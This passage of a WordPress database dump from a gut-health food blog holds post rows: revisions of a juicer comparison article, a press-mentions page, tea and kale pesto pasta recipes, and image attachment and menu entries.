Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n\"\"\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Title: Choosing the Best Juicer: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-10-07 06:04:14','2023-10-07 06:04:14','',5537,'https://tummyrevolution.com/?p=5649',0,'revision','',0),(5648,1,'2023-10-07 05:59:17','2023-10-07 05:59:17','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n\"\"\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Title: Choosing the Best Juicer: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-10-07 05:59:17','2023-10-07 05:59:17','',5537,'https://tummyrevolution.com/?p=5648',0,'revision','',0),(5145,1,'2020-04-13 13:10:23','2020-04-13 13:10:23','\n

Evening Standard

\n\n\n\n
\"\"
\n\n\n\n

Healthy Diet Magazine

\n\n\n\n
\"\"
\n\n\n\n

Take a break

\n\n\n\n
\"\"
\n\n\n\n

Pick Me Up Jan Special

\n\n\n\n
\"\"
\n\n\n\n

The People

\n\n\n\n
\"\"
\n\n\n\n

METRO

\n\n\n\n

\n\n\n\n\n\n\n\n

In The Moment Magazine

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Mail Online

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Best Magazine

\n\n\n\n
\"\"
\n\n\n\n

Northern Woman

\n\n\n\n
\"\"
\n\n\n\n

A Balance Belly

\n\n\n\n
\"\"
\n\n\n\n

Sunday Mirror

\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n

Norther Life

\n\n\n\n
\"\"
\n\n\n\n

Man V Fat

\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n

Sunday Mirror

\n\n\n\n
\"\"
\n\n\n\n

The Weekly News

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Dietitian\'s Life

\n\n\n\n\n\n\n\n
\"\"
\n','Tummy Revolution in the Press','','publish','closed','closed','','tummy-revolution-in-the-press','','','2020-04-19 03:20:44','2020-04-19 03:20:44','',0,'http://tummyrevolution.com/?page_id=5145',0,'page','',0),(5146,1,'2020-04-13 11:38:26','2020-04-13 11:38:26','','press-Northern-life-mag','','inherit','open','closed','','press-northern-life-mag','','','2020-04-13 11:38:26','2020-04-13 11:38:26','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/press-Northern-life-mag.jpg',0,'attachment','image/jpeg',0),(5147,1,'2020-04-13 12:05:14','2020-04-13 12:05:14','','Screenshot 2020-04-13 at 15.56.49','','inherit','open','closed','','screenshot-2020-04-13-at-15-56-49','','','2020-04-13 12:05:14','2020-04-13 12:05:14','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.56.49.png',0,'attachment','image/png',0),(5148,1,'2020-04-13 12:05:20','2020-04-13 12:05:20','','Screenshot 2020-04-13 at 15.57.33','','inherit','open','closed','','screenshot-2020-04-13-at-15-57-33','','','2020-04-13 12:05:20','2020-04-13 12:05:20','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.57.33.png',0,'attachment','image/png',0),(5149,1,'2020-04-13 12:05:25','2020-04-13 12:05:25','','Screenshot 2020-04-13 at 15.57.54','','inherit','open','closed','','screenshot-2020-04-13-at-15-57-54','','','2020-04-13 12:05:25','2020-04-13 12:05:25','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.57.54.png',0,'attachment','image/png',0),(5150,1,'2020-04-13 12:05:29','2020-04-13 12:05:29','','Screenshot 2020-04-13 at 15.58.30','','inherit','open','closed','','screenshot-2020-04-13-at-15-58-30','','','2020-04-13 12:05:29','2020-04-13 12:05:29','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.58.30.png',0,'attachment','image/png',0),(5151,1,'2020-04-13 12:05:35','2020-04-13 12:05:35','','Screenshot 2020-04-13 at 15.58.57','','inherit','open','closed','','screenshot-2020-04-13-at-15-58-57','','','2020-04-13 12:05:35','2020-04-13 12:05:35','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.58.57.png',0,'attachment','image/png',0),(5152,1,'2020-04-13 12:05:42','2020-04-13 12:05:42','','Screenshot 2020-04-13 at 15.59.20','','inherit','open','closed','','screenshot-2020-04-13-at-15-59-20','','','2020-04-13 12:05:42','2020-04-13 12:05:42','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.59.20.png',0,'attachment','image/png',0),(5153,1,'2020-04-13 12:05:45','2020-04-13 12:05:45','','Screenshot 2020-04-13 at 15.59.33','','inherit','open','closed','','screenshot-2020-04-13-at-15-59-33','','','2020-04-13 12:05:45','2020-04-13 12:05:45','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.59.33.png',0,'attachment','image/png',0),(5154,1,'2020-04-13 12:05:50','2020-04-13 12:05:50','','Screenshot 2020-04-13 at 15.59.46','','inherit','open','closed','','screenshot-2020-04-13-at-15-59-46','','','2020-04-13 12:05:50','2020-04-13 12:05:50','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.59.46.png',0,'attachment','image/png',0),(5155,1,'2020-04-13 12:05:55','2020-04-13 12:05:55','','Screenshot 2020-04-13 at 15.59.58','','inherit','open','closed','','screenshot-2020-04-13-at-15-59-58','','','2020-04-13 12:05:55','2020-04-13 12:05:55','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-15.59.58.png',0,'attachment','image/png',0),(5156,1,'2020-04-13 12:06:08','2020-04-13 12:06:08','','Screenshot 2020-04-13 at 16.00.16','','inherit','open','closed','','screenshot-2020-04-13-at-16-00-16','','','2020-04-13 12:06:08','2020-04-13 12:06:08','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.00.16.png',0,'attachment','image/png',0),(5157,1,'2020-04-13 12:06:34','2020-04-13 12:06:34','','Screenshot 2020-04-13 at 16.00.45','','inherit','open','closed','','screenshot-2020-04-13-at-16-00-45','','','2020-04-13 12:06:34','2020-04-13 12:06:34','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.00.45.png',0,'attachment','image/png',0),(5158,1,'2020-04-13 12:07:02','2020-04-13 12:07:02','','Screenshot 2020-04-13 at 16.01.13','','inherit','open','closed','','screenshot-2020-04-13-at-16-01-13','','','2020-04-13 12:07:02','2020-04-13 12:07:02','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.01.13.png',0,'attachment','image/png',0),(5159,1,'2020-04-13 12:07:18','2020-04-13 12:07:18','','Screenshot 2020-04-13 at 16.01.31','','inherit','open','closed','','screenshot-2020-04-13-at-16-01-31','','','2020-04-13 12:07:18','2020-04-13 12:07:18','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.01.31.png',0,'attachment','image/png',0),(5160,1,'2020-04-13 12:07:23','2020-04-13 12:07:23','','Screenshot 2020-04-13 at 16.01.56','','inherit','open','closed','','screenshot-2020-04-13-at-16-01-56','','','2020-04-13 12:07:23','2020-04-13 12:07:23','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.01.56.png',0,'attachment','image/png',0),(5161,1,'2020-04-13 12:07:30','2020-04-13 12:07:30','','Screenshot 2020-04-13 at 16.02.14','','inherit','open','closed','','screenshot-2020-04-13-at-16-02-14','','','2020-04-13 12:07:30','2020-04-13 12:07:30','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.02.14.png',0,'attachment','image/png',0),(5162,1,'2020-04-13 12:07:37','2020-04-13 12:07:37','','Screenshot 2020-04-13 at 16.02.26','','inherit','open','closed','','screenshot-2020-04-13-at-16-02-26','','','2020-04-13 12:07:37','2020-04-13 12:07:37','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.02.26.png',0,'attachment','image/png',0),(5163,1,'2020-04-13 12:07:44','2020-04-13 12:07:44','','Screenshot 2020-04-13 at 16.02.40','','inherit','open','closed','','screenshot-2020-04-13-at-16-02-40','','','2020-04-13 12:07:44','2020-04-13 12:07:44','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.02.40.png',0,'attachment','image/png',0),(5164,1,'2020-04-13 12:07:51','2020-04-13 12:07:51','','Screenshot 2020-04-13 at 16.02.52','','inherit','open','closed','','screenshot-2020-04-13-at-16-02-52','','','2020-04-13 12:07:51','2020-04-13 12:07:51','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.02.52.png',0,'attachment','image/png',0),(5165,1,'2020-04-13 12:07:57','2020-04-13 12:07:57','','Screenshot 2020-04-13 at 16.03.10','','inherit','open','closed','','screenshot-2020-04-13-at-16-03-10','','','2020-04-13 12:07:57','2020-04-13 12:07:57','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.03.10.png',0,'attachment','image/png',0),(5166,1,'2020-04-13 12:08:02','2020-04-13 12:08:02','','Screenshot 2020-04-13 at 16.03.31','','inherit','open','closed','','screenshot-2020-04-13-at-16-03-31','','','2020-04-13 12:08:02','2020-04-13 12:08:02','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.03.31.png',0,'attachment','image/png',0),(5167,1,'2020-04-13 12:13:23','2020-04-13 12:13:23','','Screenshot-2020-04-13-at-16.11.53','','inherit','open','closed','','screenshot-2020-04-13-at-16-11-53','','','2020-04-13 12:13:23','2020-04-13 12:13:23','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.11.53.png',0,'attachment','image/png',0),(5168,1,'2020-04-13 12:28:36','2020-04-13 12:28:36','','Screenshot 2020-04-13 at 16.24.46','','inherit','open','closed','','screenshot-2020-04-13-at-16-24-46','','','2020-04-13 12:28:36','2020-04-13 12:28:36','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.24.46.png',0,'attachment','image/png',0),(5169,1,'2020-04-13 12:28:44','2020-04-13 12:28:44','','Screenshot 2020-04-13 at 16.25.00','','inherit','open','closed','','screenshot-2020-04-13-at-16-25-00','','','2020-04-13 12:28:44','2020-04-13 12:28:44','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.25.00.png',0,'attachment','image/png',0),(5170,1,'2020-04-13 12:28:50','2020-04-13 12:28:50','','Screenshot 2020-04-13 at 16.25.16','','inherit','open','closed','','screenshot-2020-04-13-at-16-25-16','','','2020-04-13 12:28:50','2020-04-13 12:28:50','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.25.16.png',0,'attachment','image/png',0),(5171,1,'2020-04-13 12:28:52','2020-04-13 12:28:52','','Screenshot 2020-04-13 at 16.25.24','','inherit','open','closed','','screenshot-2020-04-13-at-16-25-24','','','2020-04-13 12:28:52','2020-04-13 12:28:52','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.25.24.png',0,'attachment','image/png',0),(5172,1,'2020-04-13 12:28:56','2020-04-13 12:28:56','','Screenshot 2020-04-13 at 16.25.42','','inherit','open','closed','','screenshot-2020-04-13-at-16-25-42','','','2020-04-13 12:28:56','2020-04-13 12:28:56','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.25.42.png',0,'attachment','image/png',0),(5173,1,'2020-04-13 12:29:08','2020-04-13 12:29:08','','Screenshot 2020-04-13 at 16.25.53','','inherit','open','closed','','screenshot-2020-04-13-at-16-25-53','','','2020-04-13 12:29:08','2020-04-13 12:29:08','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.25.53.png',0,'attachment','image/png',0),(5174,1,'2020-04-13 12:29:17','2020-04-13 12:29:17','','Screenshot 2020-04-13 at 16.26.00','','inherit','open','closed','','screenshot-2020-04-13-at-16-26-00','','','2020-04-13 12:29:17','2020-04-13 12:29:17','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.26.00.png',0,'attachment','image/png',0),(5175,1,'2020-04-13 12:29:29','2020-04-13 12:29:29','','Screenshot 2020-04-13 at 16.26.12','','inherit','open','closed','','screenshot-2020-04-13-at-16-26-12','','','2020-04-13 12:29:29','2020-04-13 12:29:29','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.26.12.png',0,'attachment','image/png',0),(5176,1,'2020-04-13 12:31:48','2020-04-13 12:31:48','','Screenshot-2020-04-13-at-16.31.31','','inherit','open','closed','','screenshot-2020-04-13-at-16-31-31','','','2020-04-13 12:31:48','2020-04-13 12:31:48','',5145,'http://tummyrevolution.com/wp-content/uploads/2020/04/Screenshot-2020-04-13-at-16.31.31.png',0,'attachment','image/png',0),(5177,1,'2020-04-13 13:03:56','2020-04-13 13:03:56','\n

Evening Standard

\n\n\n\n
\"\"
\n\n\n\n

Healthy Diet Magazine

\n\n\n\n
\"\"
\n\n\n\n

Take a break

\n\n\n\n
\"\"
\n\n\n\n

Pick Me Up Jan Special

\n\n\n\n
\"\"
\n\n\n\n

The People

\n\n\n\n
\"\"
\n\n\n\n

METRO

\n\n\n\n

\n\n\n\n\n\n\n\n

In The Moment Magazine

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Mail Online

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Best Magazine

\n\n\n\n
\"\"
\n\n\n\n

Northern Woman

\n\n\n\n
\"\"
\n\n\n\n

A Balance Belly

\n\n\n\n
\"\"
\n\n\n\n

Sunday Mirror

\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n

Norther Life

\n\n\n\n
\"\"
\n\n\n\n

Man V Fat

\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n

Sunday Mirror

\n\n\n\n
\"\"
\n\n\n\n

The Weekly News

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Dietitian\'s Life

\n\n\n\n\n\n\n\n
\"\"
\n','Tummy Revolution in the Press','','inherit','closed','closed','','5145-revision-v1','','','2020-04-13 13:03:56','2020-04-13 13:03:56','',5145,'http://tummyrevolution.com/5145-revision-v1/',0,'revision','',0),(5178,1,'2020-04-13 13:10:23','2020-04-13 13:10:23','\n

Evening Standard

\n\n\n\n
\"\"
\n\n\n\n

Healthy Diet Magazine

\n\n\n\n
\"\"
\n\n\n\n

Take a break

\n\n\n\n
\"\"
\n\n\n\n

Pick Me Up Jan Special

\n\n\n\n
\"\"
\n\n\n\n

The People

\n\n\n\n
\"\"
\n\n\n\n

METRO

\n\n\n\n

\n\n\n\n\n\n\n\n

In The Moment Magazine

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Mail Online

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Best Magazine

\n\n\n\n
\"\"
\n\n\n\n

Northern Woman

\n\n\n\n
\"\"
\n\n\n\n

A Balance Belly

\n\n\n\n
\"\"
\n\n\n\n

Sunday Mirror

\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n

Norther Life

\n\n\n\n
\"\"
\n\n\n\n

Man V Fat

\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n

Sunday Mirror

\n\n\n\n
\"\"
\n\n\n\n

The Weekly News

\n\n\n\n
\"\"
\n\n\n\n\n\n\n\n

Dietitian\'s Life

\n\n\n\n\n\n\n\n
\"\"
\n','Tummy Revolution in the Press','','inherit','closed','closed','','5145-revision-v1','','','2020-04-13 13:10:23','2020-04-13 13:10:23','',5145,'http://tummyrevolution.com/5145-revision-v1/',0,'revision','',0),(5441,1,'2023-09-11 05:24:30','2023-09-11 05:24:30','http://tummyrevolution.com/wp-content/uploads/2023/09/revslider','revslider','','private','open','closed','','revslider','','','2023-09-11 05:24:30','2023-09-11 05:24:30','',0,'http://tummyrevolution.com/wp-content/uploads/2023/09/revslider',0,'attachment','',0),(5181,1,'2020-04-13 13:13:09','2020-04-13 13:13:09',' ','','','publish','closed','closed','','5181','','','2020-04-13 13:13:09','2020-04-13 13:13:09','',0,'http://tummyrevolution.com/5181/',105,'nav_menu_item','',0),(5183,1,'2020-04-15 16:34:17','2020-04-15 16:34:17','\n

Working out what drinks to have when you have a sensitive tummy can be a bit tricky.
There are plenty of tummy friendly teas to choose from such as:

\n\n\n\n
  • Peppermint tea
  • Green tea
  • White tea
  • Black tea
\n\n\n\n
\"\"/
\n\n\n\n

I also love orange and ginger tea. It\'s tummy soothing and refreshing. It also has anti-inflammatory antioxidants and antibacterial properties, which can help relieve stomach irritations, nausea and headaches. It\'s also great if you feel like you\'re coming down with a cold, just like I feel at the moment.

\n\n\n\n


Makes 2 cups, Minutes 5, Difficulty 2/10

INGREDIENTS

\n\n\n\n
  • 500ml (2 cups) water
  • the juice of 1 orange
  • 1 tsp freshly grated or dry ginger
  • 2 mint sprigs
  • 1 tbsp maple syrup (optional)

\n\n\n\n

INSTRUCTIONS

1. In a saucepan, bring the water to a boil.

\n\n\n\n

2. Cut the orange in half and cut one slice to use for garnish.

\n\n\n\n

3. Squeeze the juice out of one orange.

\n\n\n\n

4. Grate the ginger (if you are using fresh).

\n\n\n\n

5. Add the remaining ingredients to the boiling water and let it simmer for a minute or two.

\n\n\n\n

6. Serve in a cup and garnish with the orange slice and mint.

\n\n\n\n
\"\"/
\n','Orange Ginger Mint Tea + other tummy friendly teas','','inherit','closed','closed','','4674-revision-v1','','','2020-04-15 16:34:17','2020-04-15 16:34:17','',4674,'http://tummyrevolution.com/4674-revision-v1/',0,'revision','',0),(5184,1,'2020-04-15 16:36:14','2020-04-15 16:36:14','\n

\n\n\n\n

Pasta and pesto is a healthy quick meals that’s perfect for busy days in the week when you’re short of time. Made with kale, this version boasts great flavour. Kale is also a nutrient dense food full of antioxidants, vitamins and minerals.

\n\n\n\n
\"\"
\n\n\n\n

Makes 1-2 Serving

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (200g) gluten free spaghetti, gluten free pasta of choice or courgetti

\n\n\n\n

1/3 cup (85g) pine nuts, toasted
(Alternatively you can swap the pine nuts for walnuts)

\n\n\n\n

2 cups (85g) kale

\n\n\n\n

2/3 cup (85g) Parmesan (grated) and a little more for serving

\n\n\n\n

1/3 cup (75ml) extra virgin olive oil

\n\n\n\n

1/3 cup (75ml) garlic infused olive oil

\n\n\n\n

Juice of ½ lemon

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Bring a large pan of water to boil over high heat. Add the pasta and cook according to package instructions until \'al dente\'.

\n\n\n\n

2. Whilst the pasta is cooking, add the pine nuts or walnuts to a frying pan (no oil needed) and toast on medium heat for a few minutes until golden brown. Put a few pine nuts or walnuts aside for garnish when serving.  

\n\n\n\n

2. Put the rest of the pine nuts, Parmesan, garlic, oils, kale and lemon juice in a food processor and whizz to a smooth paste.

\n\n\n\n

4. Drain the pasta and place in a serving dish. 

\n\n\n\n

3. Stir 2-3 tablespoons of pesto through the pasta and top it with the remaining pine nuts or walnuts and some Parmesan. 

\n\n\n\n

4. Put the remaining pesto in an airtight container or jar adding a little bit of extra olive oil to cover the surface. It will keep in the fridge for up to a week or you can freeze it for up to a month.

\n\n\n\n
\"\"
\n','Pasta and courgetti with super kale pesto and roasted pinenuts','','inherit','closed','closed','','5060-revision-v1','','','2020-04-15 16:36:14','2020-04-15 16:36:14','',5060,'http://tummyrevolution.com/5060-revision-v1/',0,'revision','',0),(5185,1,'2020-04-15 16:36:23','2020-04-15 16:36:23','\n

\n\n\n\n

Pasta and pesto is a healthy quick meals that’s perfect for busy days in the week when you’re short of time. Made with kale, this version boasts great flavour. Kale is also a nutrient dense food full of antioxidants, vitamins and minerals.

\n\n\n\n
\"\"
\n\n\n\n

Makes 1-2 Serving

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (200g) gluten free spaghetti, gluten free pasta of choice or courgetti

\n\n\n\n

1/3 cup (85g) pine nuts, toasted
(Alternatively you can swap the pine nuts for walnuts)

\n\n\n\n

2 cups (85g) kale

\n\n\n\n

2/3 cup (85g) Parmesan (grated) and a little more for serving

\n\n\n\n

1/3 cup (75ml) extra virgin olive oil

\n\n\n\n

1/3 cup (75ml) garlic infused olive oil

\n\n\n\n

Juice of ½ lemon

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Bring a large pan of water to boil over high heat. Add the pasta and cook according to package instructions until \'al dente\'.

\n\n\n\n

2. Whilst the pasta is cooking, add the pine nuts or walnuts to a frying pan (no oil needed) and toast on medium heat for a few minutes until golden brown. Put a few pine nuts or walnuts aside for garnish when serving.  

\n\n\n\n

2. Put the rest of the pine nuts, Parmesan, garlic, oils, kale and lemon juice in a food processor and whizz to a smooth paste.

\n\n\n\n

4. Drain the pasta and place in a serving dish. 

\n\n\n\n

3. Stir 2-3 tablespoons of pesto through the pasta and top it with the remaining pine nuts or walnuts and some Parmesan. 

\n\n\n\n

4. Put the remaining pesto in an airtight container or jar adding a little bit of extra olive oil to cover the surface. It will keep in the fridge for up to a week or you can freeze it for up to a month.

\n\n\n\n
\"\"
\n','Pasta and courgetti with super kale pesto and roasted pine nuts','','inherit','closed','closed','','5060-revision-v1','','','2020-04-15 16:36:23','2020-04-15 16:36:23','',5060,'http://tummyrevolution.com/5060-revision-v1/',0,'revision','',0),(5188,1,'2020-04-17 00:49:38','2020-04-17 00:49:38','','Tummy Revolution in Press','','publish','closed','closed','','tummy-revolution','','','2020-04-20 02:02:38','2020-04-20 02:02:38','',0,'http://tummyrevolution.com/?p=5188',3,'nav_menu_item','',0),(5189,1,'2020-04-17 01:14:10','2020-04-17 01:14:10','','TUMMY REVOLUTION IN PRESS','','publish','closed','closed','','5189','','','2020-04-22 22:36:44','2020-04-22 22:36:44','',0,'http://tummyrevolution.com/?p=5189',5,'nav_menu_item','',0),(5190,1,'2020-04-17 01:59:10','2020-04-17 01:59:10','','facebook','','inherit','open','closed','','facebook','','','2020-04-17 01:59:10','2020-04-17 01:59:10','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/facebook.png',0,'attachment','image/png',0),(5192,1,'2020-04-17 02:08:10','2020-04-17 02:08:10','','tumblr','','inherit','open','closed','','tumblr','','','2020-04-17 02:10:07','2020-04-17 02:10:07','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/tumblr.png',0,'attachment','image/png',0),(5193,1,'2020-04-17 02:13:04','2020-04-17 02:13:04','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','FREE RESOURCES','','publish','closed','closed','','free-resources','','','2020-04-19 03:24:49','2020-04-19 03:24:49','',0,'http://tummyrevolution.com/?page_id=5193',0,'page','',0),(5194,1,'2020-04-17 02:13:04','2020-04-17 02:13:04','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','FREE RESOURCES','','inherit','closed','closed','','5193-revision-v1','','','2020-04-17 02:13:04','2020-04-17 02:13:04','',5193,'http://tummyrevolution.com/5193-revision-v1/',0,'revision','',0),(5195,1,'2020-04-17 02:15:10','2020-04-17 02:15:10','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','FREE RESOURCES','','inherit','closed','closed','','5193-revision-v1','','','2020-04-17 02:15:10','2020-04-17 02:15:10','',5193,'http://tummyrevolution.com/5193-revision-v1/',0,'revision','',0),(5196,1,'2020-04-17 02:17:00','2020-04-17 02:17:00','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-17 02:17:00','2020-04-17 02:17:00','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5199,1,'2020-04-17 02:28:10','2020-04-17 02:28:10',' ','','','publish','closed','closed','','5199','','','2020-04-22 22:36:44','2020-04-22 22:36:44','',0,'http://tummyrevolution.com/5199/',6,'nav_menu_item','',0),(5201,1,'2020-04-19 00:59:46','2020-04-19 00:59:46','[vc_row][vc_column][vc_column_text]I am text 